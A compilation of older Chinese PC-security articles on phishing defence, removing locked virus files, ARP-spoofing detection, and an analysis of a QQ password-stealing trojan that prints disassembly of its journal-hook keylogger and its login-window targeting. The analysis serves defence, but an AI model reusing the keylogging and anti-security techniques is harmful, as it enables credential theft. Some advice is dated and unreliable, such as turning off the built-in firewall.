实战讲解防范网络钓鱼技术大全

（1）增强IE的安全性

将IE的安全级别设置为“中级”时，对ActiveX控件、小程序以及脚本的监控过于宽松。一些Web应用，比如在线购物的表单程序以及安全扫描程序需要ActiveX以及Javascript才能正常运行，但是打开这些功能也为恶意代码和黑客打开了方便之门。要想让IE更加安全，在IE中打开“工具->Internet选项->安全->自定义级别”，在“安全设置”对话框下方展开下拉列表选择“高”，然后单击“重置”按钮。

但是将IE安全级别设置为“高”之后，浏览器在访问网站时会不断弹出警告窗口。解决这个问题的方法是，将需要经常访问的网站添加到IE的“受信任的站点”列表中：选择命令“工具->Internet选项->安全”，单击“受信任的站点”图标，然后单击“站点”按钮。

输入网站地址，单击“添加”按钮。如果需要添加更多网站可以重复该操作。注意要清除“对该区域中的所有站点要求服务器验证(https:)”复选框。完成设置后，单击两次“确定”按钮。

（2）安装Netcraft Toolbar

2004年互联网服务厂商Netcraft已经发布了它自己的IE安全工具插件。这款插件能够帮助IE 用户免受钓鱼式欺诈攻击。Netcraft Toolbar能够封杀由其他用户报告的钓鱼式欺诈网站。

Netcraft去年12月份发布了的Netcraft Toolbar 目前，被发现和封杀的钓鱼式欺诈攻击网站达到了7000多个。除了封杀钓鱼式攻击网站外，Netcraft Toolbar还包括能够帮助用户在上网时更注重安全的其它功能。

例如它能够对网站的危险性“打分”，显示有关网站的访问量和网站所在国家的信息。 Netcraft Toolbar还能够根据使用的字符“诱捕”可疑的网站，强制显示浏览器的导航按钮，打击企图隐藏这些按钮的弹出式窗口。

用户可以免费从官方网址是：http://www.netcraft.com/的网站上下载这款工具条。下载链接：http://dlc.pconline.com.cn/filedown.jsp?id=56955&dltypeid=1 ，Netcraft Toolbar安装文件是：NetcraftToolbar.msi。Netcraft Toolbar工作界面见图9。



图9 IE浏览器的 Netcraft Toolbar工作界面

（3）禁用WSH

针对改写和重指向威胁，这种手段利用了Windows脚本，不需要用户点击电子邮件中的链接，只要邮件一打开，一段脚本就会被执行。这些代码将会改写受感染计算机的主机文件。如果修改成功，当用户登录网络银行时，他实际上会被指向伪造的网站。这个伪造的网站会收集用户输入的账号、密码以及其他个人信息。所以禁用WSH是一种选择。

（4）升级IE版本到7.0

IE7中内嵌的钓鱼欺诈过滤器主要是为了保护用户远离钓鱼欺诈网站，保护隐私，并且整个过程做到透明和灵活。微软会提供选择用或是不用的自由，所有发往反欺诈服务器的请求都将使用SSL进行加密。这就是钓鱼欺诈过滤器的设计原则。

IE7采用向反钓鱼欺诈服务器实时查询的方式，而不是像一些反间谍软件那样定时下载一份站点列表文件，选择实时查询的原因有二，一是它能比使用静态站点列表方式提供更好的保护；二是可以避免给网络增加过重的负载。欺诈过滤器确实可以定时下载一份已知为安全的站点列表，但钓鱼欺诈攻击可以在24～48个小时内转移到新的地址，这比发布站点列表要更快。

另外如果要求用户不断地下载站点列表还要考虑网络负载因素，目前可能用于发动钓鱼欺诈攻击的计算机数量要远远超过间谍软件的数量，每小时都去下载新的黑名单列表将会严重影响网络的正常流量。 IE7是利用以下经过欺诈过滤器的数据的，

● 如果你不亲自启动这项功能，过滤器将不会连接到反欺诈服务器，不会检查任何站点；

● 只有当一个站点不在IE所下载的“已知为安全”的站点列表里时，过滤器才会对其进行检查；

● 像URL中的查询字符串等潜在的敏感数据在被送到反欺诈服务器进行检查之前将被全部删除。其他和网络浏览相关的数据如http cookies等不会被送到微软那里;

● 通过使用加密的SSL连接，URL将被安全地送到服务器中以保护隐私信息。

（5）其他

打开Windows的自动更新功能，在Windows XP中，打开“开始->控制面板->安全设置(在分类视图中)->自动更新”。在Windows 2000 中，打开“开始->设置->控制面板->自动更新”。不管是哪个版本的Windows操作系统，确保选中“自动更新(推荐)”选项。另外，你还可以让Windows开始下载更新文件的时候通知你，或者进行手工更新。

Windows XP Service Pack 2中最受欢迎的新功能就是Windows安全中心，当计算机中的防火墙或反病毒软件没有打开或者没有及时更新时，安全中心会提出警告。Windows XP自带的防火墙只能抵御一些外来的入侵行为，但是无法预防一些可疑的对外连接。我们推荐用户关闭Windows XP自带的防火墙，安装Zone Labs的ZoneAlarm或者其他第三方防火墙工具，这样才能有效地同时预防这两种安全威胁。

3.定期对Windows体检

无论是网络管理员还是个人用户都应该经常到你所安装的系统发行商的主页上去找最新的补丁。推荐使用微软发布的MBSA1.2来实现全方面检查Windows系统和应用软件的漏洞。Microsoft Baseline Security Analyzer（MBSA）工具允许用户扫描一台或多台基于 Windows 操作系统的计算机，以发现常见的安全方面的配置错误。

MBSA 将扫描基于 Windows 的计算机，并检查操作系统和已安装的其他组件（如 IIS和 SQL Server），以发现安全方面的配置错误，并及时通过推荐的安全更新进行修补。首先要把Windows 2000的浏览器升级到IE5.01以上，并且安装MSXML Parser 3.0以上版本（下载链接：http://download.microsoft.com/do ... 03a32/msxml3usa.msi ）这是因为MBSA检查报告存储格式是XML，所以需要使用微软的MSXML解析器读取XML文档。

http://download.microsoft.com/do ... a8/MBSASetup-en.msi 最新版本1.23361.2。 安装MBSA1.2后在桌面上找到该工具的快捷方式。工作界面见图10。



图10以不同颜色的符号，显示系统漏洞。如：绿色的“√”图标表示该项目已经通过检测。红颜色的“×”表明不安全的因素，黄颜色的“×”表明MBSA无法确认其安全性，二者（红色或黄色）的图标表示该项目没有通过检测，即存在漏洞或安全隐患。

蓝色的“*”图标表示该项目虽然通过了检测但可以进行优化，或者是由于某种原因MBSA跳过了其中的某项检测。白色的“i”图标表示该项目虽然没有通过检测，但问题不很严重，只要进行简单的修改即可。

对于第一个系统漏洞“Password test”的详细情况，点击“Result Details”可以看到它的详细解释。下面点击“How to correct this”可以得到如何修补这个漏洞的方法和建议以及下载补丁的网址。

MBSA 是面向 Windows NT 4、Windows 2000、Windows XP 和 Windows Server 2003 系统的安全评估工具，MBSA1.2不但能为我们找到系统需要的补丁,并且介绍给我们如何去做。

总结：

网络钓鱼之所以如此猖獗并且能够频频得手，最大的原因就是利用了人们疏于防范的心理以及“贪小便宜”和“贪图便利”的弱点。网络钓鱼投下足够吸引猎物上钩的“美味鱼饵”或恐吓，或诱惑，用户的防线在这些因素的干扰下彻底崩溃而咬住了钩子。

这是任何软件也无法解决的，因为毒在心，而非工具软件。当然这些骗术也涉及了一些技术手段，但是社会工程学的影响却成了最大的干扰。

杀毒时发现病毒时提示“清除失败”怎么办？

很多网友在保卫自己的爱机时，不管使用了哪些杀毒软件，几乎都会碰到储如此类的问题，如：

清除病毒失败怎么办？

杀毒出现清除失败怎么办？

清除失败或未解决病毒怎么办？

发现病毒时提示“删除失败”，怎么办？

发现病毒时提示“清除失败”，怎么办？

系统中了病毒、木马、蠕虫，清除、隔离、删除失败怎么办？

产生这些问题的主要原因在于：

1、病毒正在使用中；

2、病毒防止杀毒软件清除而做的自我保护；

3、病毒中有守护进程在保护病毒；

简单解释下这其中的原因：

1、这是较早期的杀毒软件无法清除病毒时的提示，比如一个文件，如果你正在打开使用它时，你是没有办法删除这个文件的， 因为文件正在使用中，受到系统正常的保护；同样病毒进程如果没有终止掉，直接删除病毒文件的话，同样会提示该信息；

2、 原因2与原因3可以归类来说，简单地讲，就相当于病毒躲在巨人的身后，你想要抓住这个“病毒”，首先要打败这个“巨人”，否则就会受到“巨人”的干扰而让你无法顺利抓到这个“病毒”。同样地，病毒为了防止自己不被杀毒软件查杀、剿灭，而使用了如：权限提升到系统级、阻止病毒进程被终止、阻止病毒体被删除、电脑中同时存在2个以上的病毒，相互负责监控对方，如发现自己的保护对象不存在了，重新生成新的病毒体、、、

解决办法：

1、 重新启动电脑进入操作系统的安全模式， 使用杀毒软件清除或手工删除病毒体；

2、 有时候,清除病毒的时候,会遇到删除不到的文件,这时候就需要利用一些软件来删除,或者进入安全模式直接删除,这里介绍一下软件删除.我们利用到的软件就是killbox.

http://download.pchome.net/utility/antivirus/others/19347.html

这里下载killbox,解压缩,双击打开运行,

确认了要删除的文件,再填上文件的完整路径,或通过游览选中此文件,然后在单击旁边的红x.(某些文件可能需要重启电脑)

，之后，你可以通过杀毒软件清除或手工删除；

无法删除病毒文件怎么办，用以下两个软件

Killbox是一款小巧的可删除硬盘中任意文件的小工具。主要用途就是 清除那些正在运行而无法删除的文件(类似病毒、木马什么的)。不用为 清除某些病毒或木马文件而进入黑洞洞的DOS界面了。软件另外带了清理系统垃圾文件，进程管理，调用资源管理器和注册表， 查看系统服务，文件查找等多个功能，不愧为口袋版的小工具



下载地址1

下载地址2

下载地址3

下载地址4

你重命名或删除一个文件/文件夹时，Windows 弹出对话框提示你“无法删除 xxx：它正在被其它用户/程序使用！”，怎么办？ 使用 Unlocker ，你就可以轻松、方便、有效地解决这个虽小但很烦人的问题！ 同类的工具中，综合易用性、功能强度，此款是目前最好的！ 安装后，当你要删除文件的时候，右键选择Unlocker 即可



下载地址1

下载地址2

下载地址3

阿拉QQ大盗盗号原理分析

阿拉QQ大盗盗号原理分析

前言：

腾讯号称功能强大的QQ键盘锁为什么没有“锁”好用户的QQ密码、Q币？ 阿啦QQ大盗真这么牛B吗？

1、该病毒激活后，会释放出一个“Deleteme.bat”批处理文件，把自身删除。所以当你不小心双击了该病毒时，会发现病毒程序消失了；

2、创建一个病毒副本Ntdhcp.exe复制到%system32%系统目录下，随即激活该副本；

3、写入注册表HKLM\SoftWare\Microsoft\Windows\CurrentVersion\Run,键项为NTdhcp，值为"c:\WINDOWS\System32\NTdhcp.exe" ，实现自启动保护；

4、扫描系统是否存在表中的一些系统安全软件，如杀毒软件，防火墙的，如发现相关窗体或类名存在(FindWindowExA()或FindWindowA())，则终止掉其进程；

5、去掉QQ键盘锁保护

A. 如果QQ正在使用，终止该程序后修改npkcrypt.sys为npkcrypt.bak，阻止QQ.exe的加载；

B. 如果QQ没有在使用，同样改名npkcrypt.sys，阻止QQ.exe键盘锁的加载；

（哦，原来他也并不是完全从技术上攻破QQ键盘锁，这里要引起大家的注意了，如果发现QQ键盘锁成红色叉的图标，可要及时检查系统安全，以免QQ被盗）

6、打好基础后，就可以等待受害的用户上钩了。。

A. 用到日志钩子(JournalRecord),记录键盘事件；

B. 当获取到相当的类名及窗体值时，激活键盘记录事件，记录写入%Windows%\ala2qq

可以用记事本方式打开%Windows%\ala2qq，其内容结构如下：

[QQ]

这里存放号码这是密码=ok

这里存放号码这是密码=ok

[PC]

addr=

ip=

7、 部分逆向代码：

;在Win9x下实现进程隐藏

00406C2E . 68 A06C4000 PUSH 复件_qq.00406CA0 ; /FileName = "kernel32.dll"

00406C33 . E8 34DBFFFF CALL 复件_qq.0040476C ; \LoadLibraryA

00406C38 . 8945 FC MOV DWORD PTR SS:[EBP-4],EAX

00406C3B . 837D FC 20 CMP DWORD PTR SS:[EBP-4],20

00406C3F . 72 57 JB SHORT 复件_qq.00406C98

00406C41 . 68 B06C4000 PUSH 复件_qq.00406CB0 ; /ProcNameOrOrdinal =

"RegisterServiceProcess"

00406C46 . 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4] ; |

00406C49 . 50 PUSH EAX ; |hModule

00406C4A . E8 E5DAFFFF CALL 复件_qq.00404734 ; \GetProcAddress

; 3 秒检查一下

004084BE . 68 B80B0000 PUSH 0BB8 ; /Timeout = 3000. ms

004084C3 . E8 C4C2FFFF CALL 复件_qq.0040478C ; \Sleep

；下的“日志钩子”

00408451 . 6A 00 PUSH 0 ; /ThreadID = 0

00408453 . A1 50E64000 MOV EAX,DWORD PTR DS:[40E650] ; |

00408458 . 50 PUSH EAX ; |hModule => NULL

00408459 . 68 CC834000 PUSH 复件_qq.004083CC ; |Hookproc = 复件_qq.004083CC

0040845E . 6A 00 PUSH 0 ; |HookType = WH_JOURNALRECORD

00408460 . E8 EFC3FFFF CALL 复件_qq.00404854 ; \SetWindowsHookExA

回调函数地址：0x4083cc

回调函数处理过程。。。

004083CC /. 55 PUSH EBP

004083CD |. 8BEC MOV EBP,ESP

004083CF |. 53 PUSH EBX

004083D0 |. 56 PUSH ESI

004083D1 |. 57 PUSH EDI

004083D2 |. 8B5D 10 MOV EBX,DWORD PTR SS:[EBP+10]

004083D5 |. 8B7D 0C MOV EDI,DWORD PTR SS:[EBP+C]

004083D8 |. 8B75 08 MOV ESI,DWORD PTR SS:[EBP+8]

004083DB |. 85F6 TEST ESI,ESI

004083DD |. 7D 10 JGE SHORT 复件_dum.004083EF

004083DF |. 53 PUSH EBX ; /lParam

004083E0 |. 57 PUSH EDI ; |wParam

004083E1 |. 56 PUSH ESI ; |HookCode

004083E2 |. A1 F4E64000 MOV EAX,DWORD PTR DS:[40E6F4] ; |

004083E7 |. 50 PUSH EAX ; |hHook => NULL

004083E8 |. E8 C7C3FFFF CALL ; \CallNextHookEx

004083ED |. EB 34 JMP SHORT 复件_dum.00408423

004083EF |> 813B 01020000 CMP DWORD PTR DS:[EBX],201

004083F5 |. 75 0B JNZ SHORT 复件_dum.00408402

004083F7 |. 8BCB MOV ECX,EBX

004083F9 |. 8BD7 MOV EDX,EDI

004083FB |. 8BC6 MOV EAX,ESI

004083FD |. E8 AEF9FFFF CALL 复件_dum.00407DB0 ;; 跟进去， 会有好东东发现

00408402 |> 813B 00010000 CMP DWORD PTR DS:[EBX],100

00408408 |. 75 0B JNZ SHORT 复件_dum.00408415

0040840A |. 8BCB MOV ECX,EBX

0040840C |. 8BD7 MOV EDX,EDI

0040840E |. 8BC6 MOV EAX,ESI

00408410 |. E8 93FCFFFF CALL 复件_dum.004080A8 ;; 跟进去， 会有好东东发现

00408415 |> 53 PUSH EBX ; /lParam

00408416 |. 57 PUSH EDI ; |wParam

00408417 |. 56 PUSH ESI ; |HookCode

00408418 |. A1 F4E64000 MOV EAX,DWORD PTR DS:[40E6F4] ; |

0040841D |. 50 PUSH EAX ; |hHook => NULL

0040841E |. E8 91C3FFFF CALL ; \CallNextHookEx

00408423 |> 5F POP EDI

00408424 |. 5E POP ESI

00408425 |. 5B POP EBX

00408426 |. 5D POP EBP

00408427 \. C2 0C00 RETN 0C

；；处理一些窗体类名，以更准确的生成记录信息。。。

00407DB0 /$ 55 PUSH EBP

00407DB1 |. 8BEC MOV EBP,ESP

00407DB3 |. 81C4 70FFFFFF ADD ESP,-90

00407DB9 |. 53 PUSH EBX

00407DBA |. 56 PUSH ESI

00407DBB |. 57 PUSH EDI

00407DBC |. 33DB XOR EBX,EBX

00407DBE |. 899D 70FFFFFF MOV DWORD PTR SS:[EBP-90],EBX

00407DC4 |. 895D F0 MOV DWORD PTR SS:[EBP-10],EBX

00407DC7 |. 33C0 XOR EAX,EAX

00407DC9 |. 55 PUSH EBP

00407DCA |. 68 FC7F4000 PUSH 复件_dum.00407FFC

00407DCF |. 64:FF30 PUSH DWORD PTR FS:[EAX]

00407DD2 |. 64:8920 MOV DWORD PTR FS:[EAX],ESP

00407DD5 |. E8 F2C9FFFF CALL ; [GetActiveWindow

00407DDA |. 8BD8 MOV EBX,EAX

00407DDC |. 6A 14 PUSH 14 ; /Count = 14 (20.)

00407DDE |. 8D45 B5 LEA EAX,DWORD PTR SS:[EBP-4B] ; |

00407DE1 |. 50 PUSH EAX ; |Buffer

00407DE2 |. 53 PUSH EBX ; |hWnd

00407DE3 |. E8 ECC9FFFF CALL ; \GetClassNameA

00407DE8 |. 8D85 70FFFFFF LEA EAX,DWORD PTR SS:[EBP-90]

00407DEE |. 8D55 B5 LEA EDX,DWORD PTR SS:[EBP-4B]

00407DF1 |. B9 33000000 MOV ECX,33

00407DF6 |. E8 EDBEFFFF CALL 复件_dum.00403CE8

00407DFB |. 8B85 70FFFFFF MOV EAX,DWORD PTR SS:[EBP-90]

00407E01 |. BA 14804000 MOV EDX,复件_dum.00408014 ; ASCII "#32770"

00407E06 |. E8 41C0FFFF CALL 复件_dum.00403E4C

00407E0B |. 0F85 CA010000 JNZ 复件_dum.00407FDB

00407E11 |. 68 1C804000 PUSH 复件_dum.0040801C ; /Title = "注册新号码"

00407E16 |. 68 28804000 PUSH 复件_dum.00408028 ; |Class = "Static"

00407E1B |. 6A 00 PUSH 0 ; |hAfterWnd = NULL

00407E1D |. 53 PUSH EBX ; |hParent

00407E1E |. E8 A1C9FFFF CALL ; \FindWindowExA

00407E23 |. 8BF0 MOV ESI,EAX

00407E25 |. 68 30804000 PUSH 复件_dum.00408030 ; /Title = "QQ号码："

00407E2A |. 68 28804000 PUSH 复件_dum.00408028 ; |Class = "Static"

00407E2F |. 6A 00 PUSH 0 ; |hAfterWnd = NULL

00407E31 |. 53 PUSH EBX ; |hParent

00407E32 |. E8 8DC9FFFF CALL ; \FindWindowExA

00407E37 |. 8BF8 MOV EDI,EAX

00407E39 |. 68 3C804000 PUSH 复件_dum.0040803C ; /Title = "用户号码:"

00407E3E |. 68 28804000 PUSH 复件_dum.00408028 ; |Class = "Static"

00407E43 |. 6A 00 PUSH 0 ; |hAfterWnd = NULL

00407E45 |. 53 PUSH EBX ; |hParent

00407E46 |. E8 79C9FFFF CALL ; \FindWindowExA

00407E4B |. 8945 FC MOV DWORD PTR SS:[EBP-4],EAX

00407E4E |. 68 48804000 PUSH 复件_dum.00408048 ; /Title = "帐号说明"

00407E53 |. 68 28804000 PUSH 复件_dum.00408028 ; |Class = "Static"

00407E58 |. 6A 00 PUSH 0 ; |hAfterWnd = NULL

00407E5A |. 53 PUSH EBX ; |hParent

00407E5B |. E8 64C9FFFF CALL ; \FindWindowExA

00407E60 |. 85F6 TEST ESI,ESI

00407E62 |. 75 12 JNZ SHORT 复件_dum.00407E76

00407E64 |. 85FF TEST EDI,EDI

00407E66 |. 75 0E JNZ SHORT 复件_dum.00407E76

00407E68 |. 837D FC 00 CMP DWORD PTR SS:[EBP-4],0

00407E6C |. 75 08 JNZ SHORT 复件_dum.00407E76

00407E6E |. 85C0 TEST EAX,EAX

00407E70 |. 0F84 65010000 JE 复件_dum.00407FDB

00407E76 |> 68 54804000 PUSH 复件_dum.00408054 ; /Title = " 登录QQ"

00407E7B |. 68 60804000 PUSH 复件_dum.00408060 ; |Class = "Button"

00407E80 |. 6A 00 PUSH 0 ; |hAfterWnd = NULL

00407E82 |. 53 PUSH EBX ; |hParent

00407E83 |. E8 3CC9FFFF CALL ; \FindWindowExA

00407E88 |. 8BF8 MOV EDI,EAX

00407E8A |. 68 68804000 PUSH 复件_dum.00408068 ; /Title = " 登录TM"

00407E8F |. 68 60804000 PUSH 复件_dum.00408060 ; |Class = "Button"

00407E94 |. 6A 00 PUSH 0 ; |hAfterWnd = NULL

00407E96 |. 53 PUSH EBX ; |hParent

00407E97 |. E8 28C9FFFF CALL ; \FindWindowExA

00407E9C |. 8945 F8 MOV DWORD PTR SS:[EBP-8],EAX

00407E9F |. 68 74804000 PUSH 复件_dum.00408074 ; /Title = "登录"

00407EA4 |. 68 60804000 PUSH 复件_dum.00408060 ; |Class = "Button"

00407EA9 |. 6A 00 PUSH 0 ; |hAfterWnd = NULL

00407EAB |. 53 PUSH EBX ; |hParent

00407EAC |. E8 13C9FFFF CALL ; \FindWindowExA

00407EB1 |. 8BF0 MOV ESI,EAX

00407EB3 |. 68 74804000 PUSH 复件_dum.00408074 ; /Title = "登录"

00407EB8 |. 68 60804000 PUSH 复件_dum.00408060 ; |Class = "Button"

00407EBD |. 56 PUSH ESI ; |hAfterWnd

00407EBE |. 53 PUSH EBX ; |hParent

00407EBF |. E8 00C9FFFF CALL ; \FindWindowExA

00407EC4 |. 8945 F4 MOV DWORD PTR SS:[EBP-C],EAX

00407EC7 |. 8D45 A5 LEA EAX,DWORD PTR SS:[EBP-5B]

00407ECA |. 50 PUSH EAX ; /pRect

00407ECB |. 57 PUSH EDI ; |hWnd

00407ECC |. E8 43C9FFFF CALL ; \GetWindowRect

00407ED1 |. 8D45 95 LEA EAX,DWORD PTR SS:[EBP-6B]

00407ED4 |. 50 PUSH EAX ; /pRect

00407ED5 |. 8B45 F8 MOV EAX,DWORD PTR SS:[EBP-8] ; |

00407ED8 |. 50 PUSH EAX ; |hWnd

00407ED9 |. E8 36C9FFFF CALL ; \GetWindowRect

00407EDE |. 8D45 85 LEA EAX,DWORD PTR SS:[EBP-7B]

00407EE1 |. 50 PUSH EAX ; /pRect

00407EE2 |. 56 PUSH ESI ; |hWnd

00407EE3 |. E8 2CC9FFFF CALL ; \GetWindowRect

00407EE8 |. 8D85 75FFFFFF LEA EAX,DWORD PTR SS:[EBP-8B]

00407EEE |. 50 PUSH EAX ; /pRect

00407EEF |. 8B45 F4 MOV EAX,DWORD PTR SS:[EBP-C] ; |

00407EF2 |. 50 PUSH EAX ; |hWnd

00407EF3 |. E8 1CC9FFFF CALL ; \GetWindowRect

00407EF8 |. 8D45 E8 LEA EAX,DWORD PTR SS:[EBP-18]

00407EFB |. 50 PUSH EAX ; /pPoint

00407EFC |. E8 DBC8FFFF CALL ; \GetCursorPos

00407F01 |. FF75 EC PUSH DWORD PTR SS:[EBP-14] ; /Point.Y

00407F04 |. FF75 E8 PUSH DWORD PTR SS:[EBP-18] ; |Point.X

00407F07 |. 8D45 A5 LEA EAX,DWORD PTR SS:[EBP-5B] ; |

00407F0A |. 50 PUSH EAX ; |pRect

00407F0B |. E8 2CC9FFFF CALL ; \PtInRect

00407F10 |. 85C0 TEST EAX,EAX

00407F12 |. 75 40 JNZ SHORT 复件_dum.00407F54

00407F14 |. FF75 EC PUSH DWORD PTR SS:[EBP-14] ; /Point.Y

00407F17 |. FF75 E8 PUSH DWORD PTR SS:[EBP-18] ; |Point.X

00407F1A |. 8D45 95 LEA EAX,DWORD PTR SS:[EBP-6B] ; |

00407F1D |. 50 PUSH EAX ; |pRect

00407F1E |. E8 19C9FFFF CALL ; \PtInRect

00407F23 |. 85C0 TEST EAX,EAX

00407F25 |. 75 2D JNZ SHORT 复件_dum.00407F54

00407F27 |. FF75 EC PUSH DWORD PTR SS:[EBP-14] ; /Point.Y

00407F2A |. FF75 E8 PUSH DWORD PTR SS:[EBP-18] ; |Point.X

00407F2D |. 8D45 85 LEA EAX,DWORD PTR SS:[EBP-7B] ; |

00407F30 |. 50 PUSH EAX ; |pRect

00407F31 |. E8 06C9FFFF CALL ; \PtInRect

00407F36 |. 85C0 TEST EAX,EAX

00407F38 |. 75 1A JNZ SHORT 复件_dum.00407F54

00407F3A |. FF75 EC PUSH DWORD PTR SS:[EBP-14] ; /Point.Y

00407F3D |. FF75 E8 PUSH DWORD PTR SS:[EBP-18] ; |Point.X

00407F40 |. 8D85 75FFFFFF LEA EAX,DWORD PTR SS:[EBP-8B] ; |

00407F46 |. 50 PUSH EAX ; |pRect

00407F47 |. E8 F0C8FFFF CALL ; \PtInRect

00407F4C |. 85C0 TEST EAX,EAX

00407F4E |. 0F84 87000000 JE 复件_dum.00407FDB

00407F54 |> 68 7C804000 PUSH 复件_dum.0040807C ; /Title = ""

00407F59 |. 68 80804000 PUSH 复件_dum.00408080 ; |Class = "ComboBox"

00407F5E |. 6A 00 PUSH 0 ; |hAfterWnd = NULL

00407F60 |. 53 PUSH EBX ; |hParent

00407F61 |. E8 5EC8FFFF CALL ; \FindWindowExA

00407F66 |. 8D55 B5 LEA EDX,DWORD PTR SS:[EBP-4B]

00407F69 |. 52 PUSH EDX ; /lParam

00407F6A |. 6A 32 PUSH 32 ; |wParam = 32

00407F6C |. 6A 0D PUSH 0D ; |Message = WM_GETTEXT

00407F6E |. 50 PUSH EAX ; |hWnd

00407F6F |. E8 D0C8FFFF CALL ; \SendMessageA

00407F74 |. 8D45 F0 LEA EAX,DWORD PTR SS:[EBP-10]

00407F77 |. 8D55 B5 LEA EDX,DWORD PTR SS:[EBP-4B]

00407F7A |. B9 33000000 MOV ECX,33

00407F7F |. E8 64BDFFFF CALL 复件_dum.00403CE8

00407F84 |. B8 FCE64000 MOV EAX,复件_dum.0040E6FC

00407F89 |. 8B55 F0 MOV EDX,DWORD PTR SS:[EBP-10]

00407F8C |. E8 4BBCFFFF CALL 复件_dum.00403BDC

00407F91 |. 68 8C804000 PUSH 复件_dum.0040808C ; /Title = "设置密码保护"

00407F96 |. 68 28804000 PUSH 复件_dum.00408028 ; |Class = "Static"

00407F9B |. 6A 00 PUSH 0 ; |hAfterWnd = NULL

00407F9D |. 53 PUSH EBX ; |hParent

00407F9E |. E8 21C8FFFF CALL ; \FindWindowExA

00407FA3 |. 85C0 TEST EAX,EAX

00407FA5 |. 74 0F JE SHORT 复件_dum.00407FB6

00407FA7 |. B8 00E74000 MOV EAX,复件_dum.0040E700

00407FAC |. BA A4804000 MOV EDX,复件_dum.004080A4 ; ASCII "EPH"

00407FB1 |. E8 26BCFFFF CALL 复件_dum.00403BDC

00407FB6 |> 6A 00 PUSH 0 ; /Arg1 = 00000000

00407FB8 |. B9 C4724000 MOV ECX,复件_dum.004072C4 ; |

00407FBD |. B2 01 MOV DL,1 ; |

00407FBF |. A1 AC484000 MOV EAX,DWORD PTR DS:[4048AC] ; |

00407FC4 |. E8 A3C9FFFF CALL 复件_dum.0040496C ; \复件_dum.0040496C

00407FC9 |. A1 F4E64000 MOV EAX,DWORD PTR DS:[40E6F4]

00407FCE |. 50 PUSH EAX ; /hHook => NULL

00407FCF |. E8 98C8FFFF CALL ; \UnhookWindowsHookEx

00407FD4 |. 33C0 XOR EAX,EAX

00407FD6 |. A3 F0E64000 MOV DWORD PTR DS:[40E6F0],EAX

00407FDB |> 33C0 XOR EAX,EAX

00407FDD |. 5A POP EDX

00407FDE |. 59 POP ECX

00407FDF |. 59 POP ECX

00407FE0 |. 64:8910 MOV DWORD PTR FS:[EAX],EDX

00407FE3 |. 68 03804000 PUSH 复件_dum.00408003

00407FE8 |> 8D85 70FFFFFF LEA EAX,DWORD PTR SS:[EBP-90]

00407FEE |. E8 95BBFFFF CALL 复件_dum.00403B88

00407FF3 |. 8D45 F0 LEA EAX,DWORD PTR SS:[EBP-10]

00407FF6 |. E8 8DBBFFFF CALL 复件_dum.00403B88

00407FFB \. C3 RETN

00407FFC .^E9 A7B5FFFF JMP 复件_dum.004035A8

00408001 .^EB E5 JMP SHORT 复件_dum.00407FE8

00408003 . 5F POP EDI

00408004 . 5E POP ESI

00408005 . 5B POP EBX

00408006 . 8BE5 MOV ESP,EBP

00408008 . 5D POP EBP

00408009 . C3 RETN

后注：

什么日志钩子？终截者可以防止此类盗号程序吗？

在WINDOWS中，日志钩子是个很特别的钩子，它只有全局钩子一种，是键盘鼠标等输入设备的消息在系统

消息队列被取出时发生的，而且系统中只能存在一个这样的日志钩子，更重要是，它不必用在动态链接库中，

这样可以省却了为安装一个全局钩子而建立一个动态链接库的麻烦。利用日志钩子，我们可以监视各种输入事

件。

要捕捉键盘的按键动作，用键盘钩子(Keyboard Hook)也同样可以实现，但是用日志钩子却比键盘钩子要

方便许多。首先，如果要捕捉其他应用程序的按键，即做成全局钩子，键盘钩子一定要单独放在动态链接库中

，而日志钩子却不必；其次，在键盘钩子函数得到的键盘按键之前，系统已经处理过这些输入了，如果系统把

这些按键屏蔽掉，键盘钩子就无法检测到它们，例如，当输入屏幕保护程序密码时，键盘钩子无法检测到用户

输入了那些字符，而日志钩子却可以检测到。

无论是哪种钩子， 都会增加系统处理消息的时间，从而降低系统的性能，我们只有在必要的时候才安装这

些钩子，而且尽可能在不需要时移走它们。

终截者完全可以防御阿啦QQ大盗及防御同类的盗号程序！

我们如何处理该类病毒？ 我们拿什么保护自己的爱机？

1， 尽可能少去登录一些陌生网站，少到一些不正规的网站下载软件；

2， 保证病毒库的更新；

“病后吃药远不如病前防范”！

3， 建议安装使用《终截者入侵阻止》，将QQ其你的网游添加到“密码锁”保护列表中，实现事前防御。

局域网受到ARP欺骗攻击时的解决方法介绍

来源：赛迪网 作者：skid

【故障现象】当局域网内某台主机运行ARP欺骗的木马程序时，会欺骗局域网内所有主机和安全网关，让所有上网的流量必须经过病毒主机。其他用户原来直接通过安全网关上网现在转由通过病毒主机上网，切换的时候用户会断一次线。切换到病毒主机上网后，如果用户已经登陆了传奇服务器，那么病毒主机就会经常伪造断线的假像，那么用户就得重新登录传奇服务器，这样病毒主机就可以盗号了。

由于ARP欺骗的木马程序发作的时候会发出大量的数据包导致局域网通讯拥塞以及其自身处理能力的限制，用户会感觉上网速度越来越慢。当ARP欺骗的木马程序停止运行时，用户会恢复从安全网关上网，切换过程中用户会再断一次线。

【快速查找】在WebUIà系统状态à系统信息à系统历史记录中，看到大量如下的信息:

MAC SPOOF 192.168.16.200

MAC Old 00:01:6c:36:d1:7f

MAC New 00:05:5d:60:c7:18

这个消息代表了用户的MAC地址发生了变化，在ARP欺骗木马开始运行的时候，局域网所有主机的MAC地址更新为病毒主机的MAC地址(即所有信息的MAC New地址都一致为病毒主机的MAC地址)。

同时在安全网关的WebUIà高级配置à用户管理à读ARP表中看到所有用户的MAC地址信息都一样，或者在WebUIà系统状态à用户统计中看到所有用户的MAC地址信息都一样。

如果是在WebUIà系统状态à系统信息à系统历史记录中看到大量MAC Old地址都一致，则说明局域网内曾经出现过ARP欺骗(ARP欺骗的木马程序停止运行时，主机在安全网关上恢复其真实的MAC地址)。

在上面我们已经知道了使用ARP欺骗木马的主机的MAC地址，那么我们就可以使用NBTSCAN(下载地址:http://www.utt.com.cn/upload/nbtscan.rar)工具来快速查找它。

NBTSCAN可以取到PC的真实IP地址和MAC地址，如果有”传奇木马”在做怪，可以找到装有木马的PC的IP/和MAC地址。

命令:“nbtscan -r 192.168.16.0/24”(搜索整个192.168.16.0/24网段, 即192.168.16.1-192.168.16.254);或“nbtscan 192.168.16.25-137”搜索192.168.16.25-137 网段，即192.168.16.25-192.168.16.137。输出结果第一列是IP地址，最后一列是MAC地址。

NBTSCAN的使用范例:

假设查找一台MAC地址为“000d870d585f”的病毒主机。

1)将压缩包中的nbtscan.exe 和cygwin1.dll解压缩放到c:\下。

